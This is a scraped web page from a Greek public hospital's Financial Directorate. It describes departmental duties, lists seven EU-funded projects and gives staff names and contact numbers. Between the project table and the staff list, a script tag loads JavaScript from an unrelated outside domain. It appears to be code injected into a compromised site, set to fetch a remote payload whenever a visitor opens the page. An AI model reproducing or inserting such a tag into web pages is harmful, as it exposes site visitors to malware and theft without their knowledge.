Οικονομική Διεύθυνση

Τμήματα

 

ΑΡΜΟΔΙΟΤΗΤΕΣ ΟΙΚΟΝΟΜΙΚΗΣ ΥΠΗΡΕΣΙΑΣ

 1. ΤΜΗΜΑ ΛΟΓΙΣΤΗΡΙΟΥ ΜΙΣΘΟΔΟΣΙΑΣ

  Είναι υπεύθυνο για:

  • Την παρακολούθηση των αποθεμάτων των αναλωσίμων υλικών και φαρμακείου
  • Τήρηση της φορολογικής νομοθεσίας και των λογαριασμών της γενικής λογιστικής.- Προγραμματισμός πληρωμών.
  • Παρακολούθηση παγίων και αποσβέσεων
  • Μισθοδοσία προσωπικού
  • Προγραμματισμός και εκτέλεση των πάσης φύσεως προμηθειών. Διενέργεια διαγωνισμών

   

 2. ΤΜΗΜΑ ΔΙΑΧΕΙΡΙΣΗΣ ΧΡΗΜΑΤΙΚΩΝ ΔΙΑΘΕΣΙΜΩΝ

  Είναι υπεύθυνο για:

  • Την διαχείριση των χρημάτων του νοσοκομείου - ταμειακή ρευστότητα - πληρωμές - εισπράξεις
  • Επαφή με τις τράπεζες  και τους προμηθευτές

   

 3. ΤΜΗΜΑ ΚΟΣΤΟΛΟΓΗΣΗΣ ΚΑΙ ΠΙΣΤΩΤΙΚΗΣ ΠΟΛΙΤΙΚΗΣ

  Είναι υπεύθυνο για:

  • Την κοστολόγηση όλων των υπηρεσιών του νοσοκομείου
  • Την λειτουργία των αποθηκών, αποστολή παραγγελιών,παραλαβή υλικών  και την εσωτερική  διακίνησή τους
  • Την παρακολούθηση των εσόδων
  • Διατήρηση των αρχείων παροχής υπηρεσιών και πελατών

   

 4. ΤΜΗΜΑ  ΣΧΕΔΙΑΣΜΟΥ ΚΑΙ ΠΡΟΫΠΟΛΟΓΙΣΜΟΥ

  Είναι υπεύθυνο για:

  • Την κατάρτιση του ετήσιου προϋπολογισμού - ισολογισμού - απολογισμού
  • Την επεξεργασία όλων των στατιστικών στοιχείων του νοσοκομείου

Ευρωπαϊκά Προγραμμάτα

 

Γραφείο Διαχείρισης Ευρωπαϊκών Προγραμμάτων (PMO)

Το Γραφείο Διαχείρισης Ευρωπαϊκών Προγραμμάτων (PMO), κατά την διετή του λειτουργία, επικεντρώνεται κυρίως στη στρατηγική ευθυγράμμιση των έργων με τους στόχους του Νοσοκομείου. Αναλυτικότερα, αναζητά  προσκλήσεις  και συνεργασίες, ενημερώνει και συντονίζει τις κλινικές και τα τμήματα του Νοσοκομείου για την υποβολή προτάσεων χρηματοδότησης, συλλέγει τα στοιχεία και προβαίνει στις απαραίτητες διοικητικές ενέργειες. Κατά την διάρκεια υλοποίησης των εγκεκριμένων έργων, είναι αρμόδιο για την παρακολούθηση της πορείας υλοποίησης του φυσικού και οικονομικού αντικειμένου, τη διαχείριση αλλαγών που μπορεί να προκύψουν και την  ενημέρωση της Διοίκησης του Νοσοκομείου, της εκάστοτε διαχειριστικής αρχής και των ενδιαφερόμενων μερών σχετικά με την πρόοδο αυτών.

Για το 2017 στο portfolio του PMO  περιλαμβάνονται επτά (7) εγκεκριμένα έργα  τα οποία βρίσκονται σε στάδιο υλοποίησης. 

Α/Α

ΠΡΟΓΡΑΜΜΑ

ΤΙΤΛΟΣ ΕΡΓΟΥ

1

ΕΣΠΑ 2014-2020                                          "ΕΡΕΥΝΩ - ΔΗΜΙΟΥΡΓΩ - ΚΑΙΝΟΤΟΜΩ"

3 ΔΙΑΣΤΑΣΗ ΕΚΤΥΠΩΣΗ ΜΟΝΤΕΛΩΝ ΕΣΩΤΕΡΙΚΩΝ ΟΡΓΑΝΩΝ ΓΙΑ ΤΗΝ ΥΠΟΒΟΗΘΗΣΗ ΧΕΙΡΟΥΡΓΙΚΩΝ ΕΠΕΜΒΑΣΕΩΝ

2

ΕΣΠΑ 2014-2020                                  "ΕΡΕΥΝΩ - ΔΗΜΙΟΥΡΓΩ - ΚΑΙΝΟΤΟΜΩ"

KΟΙΝΩΝΙΚΑ ΡΟΜΠΟΤ ΩΣ ΕΡΓΑΛΕΙΑ ΣΤΗΝ ΕΙΔΙΚΗ ΕΚΠΑΙΔΕΥΣΗ

3

ERASMUS + PROGRAMME

 EARLY CARE TRAINING PROGRAMME FOR HEALTH CARE PROFESSIONALS WORKING WITH CHILDREN BORN WITH OROFACIAL CLEFTS AND/OR CRANIOFACIAL CONDITIONS

4

COST ACTION (EUROPEAN COOPERATION IN SCIENCE & TECHNOLOGY)

EUROPEAN CLEFT AND CRANIOFACIAL INITIATIVE FOR EQUALITY IN CARE 

5

THIRD EU HEALTH PROGRAMME /      HP-JOINT ACTION -2016-2

FACILITATING THE AUTHORISATION OF PREPARATION PROCESS FOR BLOOD AND TISSUES AND CELLS 

6

COOPERATION PROGRAMME INTERREG V-A “GREECE-BULGARIA 2014-2020”

IMPROVING QUALITY AND ACCESSIBILITY OF SOCIAL HEALTH CARE SERVICES IN CROSS-BORDER REGIONS

7

COOPERATION PROGRAM BETWEEN PAPAGEORGIOU GENERAL HOSPITAL AND ST. MARY´S INSTITUTE FOR EDUCATIONAL EXCELLENCE

ATLANTIS  - HOSPITAL OBSERVATION PROGRAM

Προσωπικό

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Διευθύντρια Οικονομικής Υπηρεσίας

Σαμψωνίδου Χρυσούλα

Προσωπικό

ΑΛΜΑΛΙΩΤΟΥ ΘΕΟΔΟΣΙΑ - ΠΕ ΟΙΚΟΝΟΜΙΚΩΝ ΕΠΙΣΤΗΜΩΝ
ΑΜΠΕΡΙΑΔΟΥ ΜΑΡΙΑ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΒΑΣΙΛΕΙΟΥ ΑΝΑΣΤΑΣΙΑ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΒΕΡΓΟΥ ΜΑΓΔΑΛΗΝΗ - Ο.Υ. ΜΙΣΘΟΔΟΣΙΑΣ
ΓΚΟΥΝΤΑ ΑΣΠΑΣΙΑ-ΜΑΡΙΑ - ΠΕ ΟΙΚΟΝΟΜΙΚΩΝ ΕΠΙΣΤΗΜΩΝ
ΕΛΕΥΘΕΡΙΑΔΟΥ ΔΕΣΠΟΙΝΑ - Ο.Υ ΧΟΡΗΓΗΣΕΙΣ ΥΛΙΚΟΥ
ΖΟΥΓΚΟΥ ΕΥΑΓΓΕΛΙΑ - Ο.Υ. ΚΟΣΤΟΛΟΓΗΣΗΣ ΚΑΙ ΠΙΣ
ΙΟΡΔΑΝΙΔΟΥ ΠΑΡΑΣΚΕΥΗ - ΠΕ ΟΙΚΟΝΟΜΙΚΩΝ ΕΠΙΣΤΗΜΩΝ
ΙΩΑΝΝΙΔΟΥ ΠΑΝΑΓΙΩΤΑ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΚΑΛΑΙΤΖΗ ΑΘΗΝΑ - ΠΡΟΪΣΤΑΜΕΝΟΣ-Η ΛΟΓΙΣΤΗΡΙΟ
ΚΑΡΑΜΗΤΟΠΟΥΛΟΥ ΑΝΑΣΤΑΣΙΑ - Ο.Υ. ΤΑΜΙΑΣ
ΚΙΑΤΣΙΟΥ ΑΝΔΡΟΜΑΧΗ - Ο.Υ. ΜΙΣΘΟΔΟΣΙΑΣ
ΚΥΡΙΑΖΗ ΜΑΓΔΑΛΗΝΗ - Ο.Υ. ΜΙΣΘΟΔΟΣΙΑΣ
ΚΩΤΣΟΥ ΙΩΑΝΝΗΣ - Ο.Υ. ΧΟΡΗΓΗΣΕΙΣ ΥΛΙΚΟΥ
ΛΙΟΣΙΟΥ ΑΓΓΕΛΙΚΗ - Ο.Υ. ΠΡΟΜΗΘΕΙΩΝ
ΛΙΟΥΛΙΑΚΗ ΒΑΣΙΛΙΚΗ - ΠΕ ΟΙΚΟΝΟΜΙΚΩΝ ΕΠΙΣΤΗΜΩΝ
ΜΑΝΔΑΛΟΥ ΑΘΑΝΑΣΙΑ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΜΑΝΤΕΣ ΝΙΚΟΛΑΟΣ - ΤΕ ΔΙΟΙΚΗΣΗΣ ΜΟΝΑΔΩΝ ΥΓΕΙ
ΜΑΡΚΟΥΛΗ ΜΑΡΙΑ - ΠΕ ΟΙΚΟΝΟΜΙΚΩΝ ΕΠΙΣΤΗΜΩΝ
ΜΟΥΣΙΑΡΗ ΑΙΚΑΤΕΡΙΝΗ - ΥΕ ΣΙΔΕΡΩΤΡΙΕΣ
ΜΠΙΓΑΚΗ ΜΑΡΙΑ - Ο.Υ. ΤΑΜΙΑΣ
ΜΠΟΥΡΑΛΗ ΚΑΛΛΙΟΠΗ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΠΡΕΒΕΛΙΑΝΑΚΗ ΜΑΡΙΑ - Ο.Υ. ΠΡΟΜΗΘΕΙΩΝ
ΡΩΜΑΝΙΔΟΥ ΕΛΕΝΗ - Ο.Υ. ΔΙΑΧΕΙΡΙΣΗΣ ΥΛΙΚΩΝ
ΣΤΑΥΡΟΠΟΥΛΟΥ ΕΥΑΓΓΕΛΙΑ - ΠΡΟΪΣΤΑΜΕΝΗ ΤΜ. ΚΟΣΤΟΛ.
ΤΖΩΝΟΥ ΑΛΕΞΑΝΔΡΑ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΤΙΜΙΑΔΟΥ ΚΥΡΙΑΚΗ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΤΣΙΝΤΑΡΗΣ ΒΑΣΙΛΕΙΟΣ - Ο.Υ. ΠΛΗΡΩΜΕΣ
ΧΑΛΒΑΤΖΗΣ ΣΤΑΥΡΟΣ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΧΑΤΖΟΠΟΥΛΟΥ ΠΟΥΠΟΥΛΑ - ΜΑΡΙΑ - ΔΕ ΔΙΟΙΚΗΤΙΚΟΥ ΛΟΓΙΣΤΙΚΟΥ
ΧΛΩΡΙΔΟΥ ΒΑΡΒΑΡΑ - Ο.Υ. ΤΙΜΟΛΟΓΗΣΗΣ

 • Επικοινωνία

  Ισόγειο
  (Χάρτης Νοσοκομείου)

  Δ/ντρια Οικονομικών Υπηρεσιών
  Σαμψωνίδου Χρυσούλα

  Τμήμα Προμηθειών Διενέργεια Διαγωνισμών
  Tηλέφωνα
  2313 323115

  2313 323119
  Τηλεμοιοτυπία
  2313 323969
  email

  Τμήμα Γενικής Λογιστικής 
  Υπόλοιπα προμηθευτών
  Tηλέφωνα
  2313 323128
  Τηλεμοιοτυπία
  2310 685111
  email